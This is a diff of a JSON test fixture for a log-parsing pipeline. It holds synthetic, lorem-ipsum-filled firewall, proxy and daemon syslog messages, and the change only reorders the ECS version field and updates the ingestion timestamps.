"2021-12-09T13:44:53.093971900Z" + "ingested": "2021-12-14T14:54:42.826911808Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:7:4-11:38:16 atatnon6064.www.invalid reverseproxy: [magnid] [adol:low] [pid 1263:roide] AH00291: long lost child came home! 
(pid tem)", "event": { - "ingested": "2021-12-09T13:44:53.093977400Z" + "ingested": "2021-12-14T14:54:42.826912437Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:7:18-18:40:50 gitse2463.www5.invalid aua: id=tvolup severity=low sys=sci sub=col name=web request blocked srcip=10.42.252.243 user=agnaaliq caller=est engine=mquisno", "event": { - "ingested": "2021-12-09T13:44:53.093981400Z" + "ingested": "2021-12-14T14:54:42.826912831Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:8:2-01:43:25 httpproxy[2078]: [mol] sc_server_cmd (umdolors) decrypt failed", "event": { - "ingested": "2021-12-09T13:44:53.093986300Z" + "ingested": "2021-12-14T14:54:42.826913222Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:8:16-08:45:59 oriosam6277.mail.localdomain frox: Listening on 10.169.5.162:6676", "event": { - "ingested": "2021-12-09T13:44:53.093990300Z" + "ingested": "2021-12-14T14:54:42.826913612Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:8:30-15:48:33 ptate3830.internal.localhost reverseproxy: [quamqua] [ntut:high] [pid 5996:meum] AH02572: Failed to configure at least one certificate and key for mini:Loremip", "event": { - "ingested": "2021-12-09T13:44:53.093995100Z" + "ingested": "2021-12-14T14:54:42.826913997Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:9:13-22:51:07 nvo6105.invalid reverseproxy: [amquaer] [aqui:medium] [pid 3340:lpa] AH00020: Configuration Failed, isn", "event": { - "ingested": "2021-12-09T13:44:53.093999100Z" + "ingested": "2021-12-14T14:54:42.826914525Z" + }, + "ecs": { + "version": "1.12.0" 
}, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:9:28-05:53:42 afcd[2492]: Classifier configuration reloaded successfully", "event": { - "ingested": "2021-12-09T13:44:53.094003900Z" + "ingested": "2021-12-14T14:54:42.826914922Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:10:12-12:56:16 edic2758.api.domain confd: id=olabori severity=medium sys=atatnon sub=lica name=secil client=uisnos facility=olores user=scipit srcip=10.54.169.175 version=1.5889 storage=onorumet object=ptatema class=eavolup type=ipsumq attributes=evitcount=tno node=iss account=taspe", "event": { - "ingested": "2021-12-09T13:44:53.094007900Z" + "ingested": "2021-12-14T14:54:42.826915336Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:10:26-19:58:50 aua[32]: id=mmo severity=high sys=tlaboru sub=aeabillo name=checking if admin is enabled srcip=10.26.228.145 user=eruntmo caller=nimve engine=usanti", "event": { - "ingested": "2021-12-09T13:44:53.094012800Z" + "ingested": "2021-12-14T14:54:42.826915716Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:11:10-03:01:24 sshd[2051]: Server listening on 10.59.215.207 port 6195.", "event": { - "ingested": "2021-12-09T13:44:53.094016800Z" + "ingested": "2021-12-14T14:54:42.826916092Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:11:24-10:03:59 ectobeat3157.mail.local reverseproxy: [uasiarch] [Malor:low] [pid 170:cillumdo] AH02312: Fatal error initialising mod_ssl, ditau.", "event": { - "ingested": "2021-12-09T13:44:53.094021500Z" + "ingested": "2021-12-14T14:54:42.826916479Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:12:8-17:06:33 ident2323.internal.corp reverseproxy: [hend] [remagna:high] [pid 873:aparia] AH01909: 10.144.21.112:90:epteurs server certificate does NOT include an ID which matches the server name", "event": { - "ingested": "2021-12-09T13:44:53.094025500Z" + "ingested": "2021-12-14T14:54:42.826916874Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:12:23-00:09:07 ttenb4581.www.host httpproxy: [rem] main (exer) shutdown finished, exiting", "event": { - "ingested": "2021-12-09T13:44:53.094030600Z" + "ingested": "2021-12-14T14:54:42.826917376Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:1:6-07:11:41 lapari5763.api.invalid frox: Listening on 10.103.2.48:4713", "event": { - "ingested": "2021-12-09T13:44:53.094034600Z" + "ingested": "2021-12-14T14:54:42.826917760Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:1:20-14:14:16 elites4713.www.localhost ulogd: id=serr severity=very-high sys=olore sub=onemul name=portscan detected action=deny fwrule=remeum seq=etur initf=lo6086 outitf=lo272 dstmac=01:00:5e:51:b9:4d srcmac=01:00:5e:15:3a:74 srcip=10.161.51.135 dstip=10.52.190.18 proto=isni length=quid tos=aUten prec=Duis ttl=uisq srcport=7807 dstport=165 tcpflags=accus info=CSed code=tiu type=wri", "event": { - "ingested": "2021-12-09T13:44:53.094039400Z" + "ingested": "2021-12-14T14:54:42.826918138Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:2:3-21:16:50 sam1795.invalid reverseproxy: [lorese] [olupta:low] [pid 3338:iqui] AH02312: Fatal error initialising mod_ssl, animide.", "event": { - "ingested": 
"2021-12-09T13:44:53.094043400Z" + "ingested": "2021-12-14T14:54:42.826918523Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:2:18-04:19:24 confd[10]: id=arch severity=high sys=data sub=ugits name=ittenb client=tobeatae facility=ntut user=llum srcip=10.232.108.32 version=1.5240 storage=idolo object=mqu class=mquido type=ende attributes=ntmollitcount=tisu node=ionofdeF account=rsp", "event": { - "ingested": "2021-12-09T13:44:53.094048300Z" + "ingested": "2021-12-14T14:54:42.826918925Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:3:4-11:21:59 nostrum6305.internal.localhost astarosg_TVM: id=llitani severity=high sys=itametco sub=etcons name=web request blocked, forbidden url detectedaction=allow method=iuntN client=utfugi facility=ursintoc user=tio srcip=10.89.41.97 dstip=10.231.116.175 version=1.5146 storage=lup ad_domain=mipsamv object=exeacomm class=sequines type=cto attributes=cusacount=nderi node=tem account=tcustatuscode=eumiu cached=nim profile=pteurs filteraction=ercitati size=835 request=ptat url=https://mail.example.net/velillu/ecatcupi.txt?rsitamet=leumiur#ssequamn referer=https://example.com/taliqui/idi.txt?undeomn=ape#itaspe error=ari authtime=umtot dnstime=onemulla cattime=atquo avscantime=borio fullreqtime=equatD device=uidol auth=inculpa ua=ruredol exceptions=iadeseru group=loremagn category=acons categoryname=nimadmi content-type=lapa reputation=emoenimi application=iquipex app-id=mqu reason=onorume filename=abill file=ametcon extension=ofdeFini time=tasnu function=deny line=tionev message=uasiarch fwrule=velites seq=uredolor initf=lo1543 outitf=lo6683 dstmac=01:00:5e:8c:f2:06 srcmac=01:00:5e:6f:71:02 proto=plica length=asiarc tos=lor prec=;nvolupt ttl=dquia srcport=5334 dstport=1525 tcpflags=umfugiat info=quisnos prec=utf caller=dolor engine=dexe localip=nemul 
host=Duis583.api.local extra=eavolupt server=10.17.51.153 cookie=aperiame set-cookie=stenat", "event": { - "ingested": "2021-12-09T13:44:53.094052300Z" + "ingested": "2021-12-14T14:54:42.826919321Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:3:18-18:24:33 xeaco7887.www.localdomain aua: id=hite severity=very-high sys=ugitsed sub=dminimve name=Packet accepted srcip=10.137.165.144 user=uptate caller=tot engine=reme", "event": { - "ingested": "2021-12-09T13:44:53.094057100Z" + "ingested": "2021-12-14T14:54:42.826919724Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:4:2-01:27:07 reverseproxy[5430]: ARGS:userPermissions: [\\\\x22dashletAccessAlertingRecentAlertsPanel\\\\x22,\\\\x22dashletAccessAlerterTopAlertsDashlet\\\\x22,\\\\x22accessViewRules\\\\x22,\\\\x22deployLiveResources\\\\x22,\\\\x22vi...\"] [severity [hostname \"iscivel3512.invalid\"] [uri \"atcupi\"] [unique_id \"eriti\"]", "event": { - "ingested": "2021-12-09T13:44:53.094061200Z" + "ingested": "2021-12-14T14:54:42.826920110Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:4:16-08:29:41 sockd[6181]: dante/server 1.202 running", "event": { - "ingested": "2021-12-09T13:44:53.094068Z" + "ingested": "2021-12-14T14:54:42.826920522Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:4:30-15:32:16 dolor5799.home afcd: Classifier configuration reloaded successfully", "event": { - "ingested": "2021-12-09T13:44:53.094072200Z" + "ingested": "2021-12-14T14:54:42.826920911Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:5:14-22:34:50 oreseosq1859.api.lan 
reverseproxy: [mmodic] [essequam:low] [pid 6691:ficiade] [client uiinea] [uianonn] virus daemon connection problem found in request https://www5.example.com/dantium/ors.htm?sinto=edi#eumiure, referer: https://example.com/adeser/mSe.gif?aute=rchite#rcit", "event": { - "ingested": "2021-12-09T13:44:53.094077Z" + "ingested": "2021-12-14T14:54:42.826921319Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:5:29-05:37:24 confd-sync[6908]: id=smoditem severity=very-high sys=tev sub=oNemoeni name=luptatem", "event": { - "ingested": "2021-12-09T13:44:53.094081100Z" + "ingested": "2021-12-14T14:54:42.826921826Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:6:12-12:39:58 autodit272.www.localhost reverseproxy: [oriss] [imadmin:very-high] [pid 1121:urve] ModSecurity: sBonoru compiled version=\"everi\"; loaded version=\"squ\"", "event": { - "ingested": "2021-12-09T13:44:53.094086Z" + "ingested": "2021-12-14T14:54:42.826922225Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:6:26-19:42:33 rporis6787.www5.localdomain reverseproxy: [quasiarc] [pta:low] [pid 3705:liqu] [client ipsu] AH01114: siarch: failed to make connection to backend: 10.148.21.7", "event": { - "ingested": "2021-12-09T13:44:53.094090300Z" + "ingested": "2021-12-14T14:54:42.826922605Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:7:11-02:45:07 reprehe5661.www.lan reverseproxy: rManage\\\\x22,\\\\x22manageLiveSystemSettings\\\\x22,\\\\x22accessViewJobs\\\\x22,\\\\x22exportList\\\\...\"] [ver \"olor\"] [maturity \"corpo\"] [accuracy \"commod\"] iumd [hostname \"ntore4333.api.invalid\"] [uri \"sitv\"] [unique_id \"equam\"]", "event": { - "ingested": 
"2021-12-09T13:44:53.094095100Z" + "ingested": "2021-12-14T14:54:42.826923001Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:7:25-09:47:41 exim[2384]: aeca-ugitse-ameiu utei:caecat:lumquid oluptat sequatD163.internal.example [10.151.206.38]:5794 lits", "event": { - "ingested": "2021-12-09T13:44:53.094099100Z" + "ingested": "2021-12-14T14:54:42.826923393Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:8:8-16:50:15 elillu5777.www5.lan pluto: \"elaudant\"[olup] 10.230.4.70 #ncu: starting keying attempt quaturve of an unlimited number", "event": { - "ingested": "2021-12-09T13:44:53.094103400Z" + "ingested": "2021-12-14T14:54:42.826923783Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:8:22-23:52:50 ecatcup3022.mail.invalid xl2tpd: Inherited by nproide", "event": { - "ingested": "2021-12-09T13:44:53.094107400Z" + "ingested": "2021-12-14T14:54:42.826924175Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:9:6-06:55:24 qui7797.www.host ipsec_starter: Starting strongSwan umet IPsec [starter]...", "event": { - "ingested": "2021-12-09T13:44:53.094111100Z" + "ingested": "2021-12-14T14:54:42.826924575Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:9:20-13:57:58 nofdeFin2037.mail.example reverseproxy: [quatD] [nevol:high] [pid 3994:Sectio] [client tiumdol] [laud] cannot read reply: Operation now in progress (115), referer: https://example.org/tquov/natu.jpg?uianonnu=por#nve", "event": { - "ingested": "2021-12-09T13:44:53.094115Z" + "ingested": "2021-12-14T14:54:42.826924962Z" }, - "tags": [ + "ecs": { + "version": 
"1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:10:4-21:00:32 sockd[7264]: dante/server 1.3714 running", "event": { - "ingested": "2021-12-09T13:44:53.094119800Z" + "ingested": "2021-12-14T14:54:42.826925359Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:10:19-04:03:07 eFinib2403.api.example reverseproxy: [utaliq] [sun:high] [pid 4074:uredol] [client quatD] [enimad] ecatcu while reading reply from cssd, referer: https://mail.example.org/urautod/eveli.html?rese=nonproi#doconse", "event": { - "ingested": "2021-12-09T13:44:53.094123900Z" + "ingested": "2021-12-14T14:54:42.826925750Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:11:2-11:05:41 confd[4939]: id=acons severity=high sys=adipisc sub=omnisist name=orroqui client=sci facility=psamvolu user=itsedqui srcip=10.244.96.61 version=1.2707 storage=onevol object=ese class=reprehen type=Exce attributes=toccacount=tinvolu node=ecatc account=iumt", "event": { - "ingested": "2021-12-09T13:44:53.094128900Z" + "ingested": "2021-12-14T14:54:42.826959255Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:11:16-18:08:15 named[1900]: reloading eddoei iono", "event": { - "ingested": "2021-12-09T13:44:53.094132900Z" + "ingested": "2021-12-14T14:54:42.826960967Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:12:1-01:10:49 obeatae2042.www.domain reverseproxy: [dquian] [isaute:low] [pid 1853:utfugit] (70007)The ula specified has expired: [client quaUteni] AH01110: error reading response", "event": { - "ingested": "2021-12-09T13:44:53.094137900Z" + "ingested": "2021-12-14T14:54:42.826961381Z" + }, + "ecs": 
{ + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:12:15-08:13:24 aerat1267.www5.example pop3proxy: Master started", "event": { - "ingested": "2021-12-09T13:44:53.094143600Z" + "ingested": "2021-12-14T14:54:42.826961774Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017:12:29-15:15:58 writt2238.internal.localdomain reverseproxy: [uaer] [aed:low] [pid 478:ain] [client scingeli] [uatDuis] mod_avscan_check_file_single_part() called with parameter filename=imip", "event": { - "ingested": "2021-12-09T13:44:53.094149200Z" + "ingested": "2021-12-14T14:54:42.826962176Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:1:12-22:18:32 siutaliq4937.api.lan reverseproxy: [siutaliq] [urvel:very-high] [pid 7721:ntium] [imadmi] Hostname in dquiac request (liquide) does not match the server name (uatD)", "event": { - "ingested": "2021-12-09T13:44:53.094154300Z" + "ingested": "2021-12-14T14:54:42.826962889Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:1:27-05:21:06 URID[7596]: T=BCSedut ------ 1 - [exit] accept: ametco", "event": { - "ingested": "2021-12-09T13:44:53.094160100Z" + "ingested": "2021-12-14T14:54:42.826964765Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:2:10-12:23:41 astarosg_TVM[1090]: id=udex severity=low sys=iam sub=animi name=UDP flood detectedaction=allow method=nsectetu client=spici facility=untutl user=hen srcip=10.214.167.164 dstip=10.76.98.53 version=1.3726 storage=uovolup ad_domain=expl object=animi class=mdoloree type=mullamco attributes=tnulcount=ons node=radip account=amremapstatuscode=dolorsit cached=atisund 
profile=isnostru filteraction=quepo size=5693 request=nisi url=https://api.example.org/iono/secillum.txt?apariat=tse#enbyCi referer=https://example.com/eetdol/aut.jpg?pitlab=tutlabor#imadmi error=nculp authtime=quamnihi dnstime=nimadmi cattime=mquiado avscantime=agn fullreqtime=dip device=urmag auth=nim ua=laboreet exceptions=tutlabo group=incid category=der categoryname=totamrem content-type=eaqu reputation=itani application=mni app-id=runtmol reason=uaer filename=nor file=saut extension=olest time=volu function=block line=osam message=ncid fwrule=loremagn seq=uisau initf=lo1255 outitf=eth965 dstmac=01:00:5e:2f:c3:3e srcmac=01:00:5e:65:2d:fe proto=ictasun length=iumto tos=ciun prec=;prehe ttl=essec srcport=4562 dstport=2390 tcpflags=uaera info=nsequa prec=yCicero caller=orporis engine=oluptate localip=tesseq host=tenbyCi4371.www5.localdomain extra=spernatu server=10.98.126.206 cookie=tion set-cookie=tNeque", "event": { - "ingested": "2021-12-09T13:44:53.094165800Z" + "ingested": "2021-12-14T14:54:42.826965214Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:2:24-19:26:15 ulogd[6722]: id=persp severity=medium sys=orev sub=lapa name=Packet logged action=allow fwrule=adminim seq=isiutali initf=lo7088 outitf=eth6357 dstmac=01:00:5e:9a:fe:91 srcmac=01:00:5e:78:1a:5a srcip=10.203.157.250 dstip=10.32.236.117 proto=turm length=quamei tos=nvento prec=nama ttl=ema srcport=6585 dstport=5550 tcpflags=xeacomm info=oriosa code=erspici type=oreeu", "event": { - "ingested": "2021-12-09T13:44:53.094171700Z" + "ingested": "2021-12-14T14:54:42.826965610Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:3:11-02:28:49 ectob5542.www5.corp reverseproxy: [agni] [ivelit:high] [pid 7755:uovol] AH00959: ap_proxy_connect_backend disabling worker for (10.231.77.26) for volups", "event": { - "ingested": 
"2021-12-09T13:44:53.094177400Z" + "ingested": "2021-12-14T14:54:42.826966012Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:3:25-09:31:24 iusmo901.www.home httpd: id=scivelit severity=high sys=untut sub=siu name=Authentication successfulaction=allow method=icons client=hende facility=umdol user=Sedutper srcip=10.2.24.156 dstip=10.113.78.101 version=1.2707 storage=amqua ad_domain=nsequatu object=aboNemoe class=mqu type=tse attributes=ntiumdcount=ueip node=amvo account=dolorsistatuscode=acc cached=quinesc profile=ulpaq filteraction=usa size=5474 request=tob url=https://www.example.org/imipsamv/doeiu.jpg?nderit=ficia#tru referer=https://mail.example.org/natuser/olupt.txt?ipsumqu=nsec#smo error=avolup authtime=litse dnstime=archit cattime=nde avscantime=tNequepo fullreqtime=byCicer device=imvenia auth=ipit ua=tdolorem exceptions=nderitin group=mquiado category=ssequa categoryname=nisist content-type=temvele reputation=ofd application=quam app-id=umdol reason=porincid filename=tisetqu file=pici extension=erit time=ehenderi function=block line=fugiatqu message=Duisaute fwrule=uptat seq=hende initf=lo3680 outitf=lo4358 dstmac=01:00:5e:0a:8f:6c srcmac=01:00:5e:34:8c:d2 proto=mnis length=ainci tos=aturve prec=;tiumdol ttl=mporain srcport=6938 dstport=6939 tcpflags=dut info=aecons prec=tionemu caller=edictasu engine=quipexea localip=orsit host=tenima5715.api.example extra=snisiut server=10.92.93.236 cookie=amr set-cookie=mfug port=7174 query=exerc uid=ntoccae", "event": { - "ingested": "2021-12-09T13:44:53.094183200Z" + "ingested": "2021-12-14T14:54:42.826966403Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:4:8-16:33:58 astarosg_TVM[6463]: id=user severity=low sys=sequamn sub=adeseru name=File extension warned and proceededaction=accept method=mquisn client=ulamcol facility=nulamcol 
user=atatno srcip=10.180.169.49 dstip=10.206.69.71 version=1.3155 storage=risni ad_domain=ccaecat object=dtemp class=onproid type=ica attributes=mnisiscount=edolor node=nonnumqu account=iscivelistatuscode=urve cached=sundeomn profile=tasu filteraction=equunt size=3144 request=ilmo url=https://mail.example.net/isqua/deF.html?iameaq=orainci#adm referer=https://api.example.org/mremap/ate.htm?tlabor=cidunt#ria error=tessec authtime=cupida dnstime=ciade cattime=busBonor avscantime=enima fullreqtime=emseq device=osamni auth=umetMa ua=equatDui exceptions=its group=setquas category=nti categoryname=osamnis content-type=atisetqu reputation=ciduntut application=atisu app-id=edutpe reason=architec filename=incul file=tevelit extension=emse time=eipsaqua function=cancel line=suntincu message=lore fwrule=equatu seq=enbyCi initf=enp0s566 outitf=lo2179 dstmac=01:00:5e:2c:9d:65 srcmac=01:00:5e:1a:03:f5 proto=orema length=iusmo tos=uunturm prec=;mSect ttl=avolupta srcport=3308 dstport=1402 tcpflags=dolo info=tsed prec=corpori caller=cillumd engine=umdol localip=turmagn host=mni4032.lan extra=amrem server=10.202.65.2 cookie=queporr set-cookie=oide", "event": { - "ingested": "2021-12-09T13:44:53.094188900Z" + "ingested": "2021-12-14T14:54:42.826966798Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:4:22-23:36:32 iscing6960.api.invalid reverseproxy: [emipsu] [incidu:very-high] [pid 5350:itation] SSL Library Error: error:itasper:failure", "event": { - "ingested": "2021-12-09T13:44:53.094194500Z" + "ingested": "2021-12-14T14:54:42.826967182Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:5:7-06:39:06 httpd[793]: [ruredo:success] [pid nculpaq:mides] [client iconseq] ModSecurity: Warning. 
nidolo [file \"runtmoll\"] [line \"tuserror\"] [id \"utlabo\"] [rev \"scip\"] [msg \"imvenia\"] [severity \"low\"] [ver \"1.6420\"] [maturity \"nisi\"] [accuracy \"seq\"] [tag \"ors\"] [hostname \"olupta3647.host\"] [uri \"uaUteni\"] [unique_id \"gitsedqu\"]amqu", "event": { - "ingested": "2021-12-09T13:44:53.094200300Z" + "ingested": "2021-12-14T14:54:42.826967565Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:5:21-13:41:41 named[6633]: FORMERR resolving 'iavolu7814.www5.localhost': 10.194.12.83#elit", "event": { - "ingested": "2021-12-09T13:44:53.094206Z" + "ingested": "2021-12-14T14:54:42.826967951Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:6:4-20:44:15 astarosg_TVM[5792]: id=elitess severity=low sys=amqua sub=mavenia name=checking if admin is enabledaction=cancel method=doc client=teurs facility=eturadi user=eturadip srcip=10.33.138.154 dstip=10.254.28.41 version=1.4256 storage=volupta ad_domain=dolor object=dolorsit class=tfugits type=lor attributes=oremcount=utper node=ueips account=umqustatuscode=ntexpli cached=siuta profile=porincid filteraction=itame size=1026 request=fugiat url=https://www5.example.org/etcons/aecatc.jpg?ditem=tut#oditautf referer=https://internal.example.org/eddoei/iatqu.htm?itessec=dat#tdol error=emul authtime=ariatu dnstime=luptate cattime=umdolore avscantime=iutaliq fullreqtime=oriosamn device=oluptate auth=tcu ua=mmodo exceptions=rauto group=lup category=orem categoryname=tutl content-type=iusmo reputation=uiavolu application=eri app-id=pis reason=riosam filename=isa file=nonnum extension=Nemoenim time=itati function=cancel line=nes message=atvolupt fwrule=umwritt seq=uae initf=enp0s3792 outitf=lo2114 dstmac=01:00:5e:24:b8:9f srcmac=01:00:5e:a1:a3:9f proto=bil length=itten tos=icer prec=;dolo ttl=siutaliq srcport=1455 dstport=6937 
tcpflags=pexeaco info=ercitati prec=dexea caller=tasnul engine=onu localip=orisnisi host=obea2960.mail.corp extra=dolor server=10.45.12.53 cookie=etdo set-cookie=edictas", "event": { - "ingested": "2021-12-09T13:44:53.094211800Z" + "ingested": "2021-12-14T14:54:42.826968353Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:6:19-03:46:49 frox[7744]: Listening on 10.99.134.49:2274", "event": { - "ingested": "2021-12-09T13:44:53.094217Z" + "ingested": "2021-12-14T14:54:42.826968746Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:7:3-10:49:23 olli5982.www.test reverseproxy: [asp] [uatDui:medium] [pid 212:unde] [client raut] [suscip] virus daemon error found in request ectetu, referer: https://example.com/ariat/ptatemU.txt?cusan=ueipsaq#upid", "event": { - "ingested": "2021-12-09T13:44:53.094221900Z" + "ingested": "2021-12-14T14:54:42.826969131Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:7:17-17:51:58 nsecte3644.internal.test reverseproxy: [tutla] [isund:high] [pid 3136:uidex] [client uptate] Invalid signature, cookie: JSESSIONID", "event": { - "ingested": "2021-12-09T13:44:53.094227600Z" + "ingested": "2021-12-14T14:54:42.826969522Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:8:1-00:54:32 confd[4157]: id=onseq severity=very-high sys=siutaliq sub=aliqu name=serro client=ctet facility=umiurere user=antium srcip=10.32.85.21 version=1.7852 storage=eaco object=onp class=ectetur type=ione attributes=utlaborecount=nci node=acommodi account=etconsec", "event": { - "ingested": "2021-12-09T13:44:53.094233400Z" + "ingested": "2021-12-14T14:54:42.826969920Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:8:15-07:57:06 econseq7119.www.home sshd: error: Could not get shadow information for NOUSER", "event": { - "ingested": "2021-12-09T13:44:53.094237700Z" + "ingested": "2021-12-14T14:54:42.826970322Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:8:29-14:59:40 ant2543.www5.lan reverseproxy: [uaturve] [lapa:high] [pid 3669:idu] [client sed] [utem] cannot read reply: Operation now in progress (115), referer: https://example.com/oremagn/ehenderi.htm?mdolo=ionul#oeiusmo", "event": { - "ingested": "2021-12-09T13:44:53.094242400Z" + "ingested": "2021-12-14T14:54:42.826970725Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:9:12-22:02:15 pluto[7138]: | sent accept notification olore with seqno = urEx", "event": { - "ingested": "2021-12-09T13:44:53.094248100Z" + "ingested": "2021-12-14T14:54:42.826971114Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] 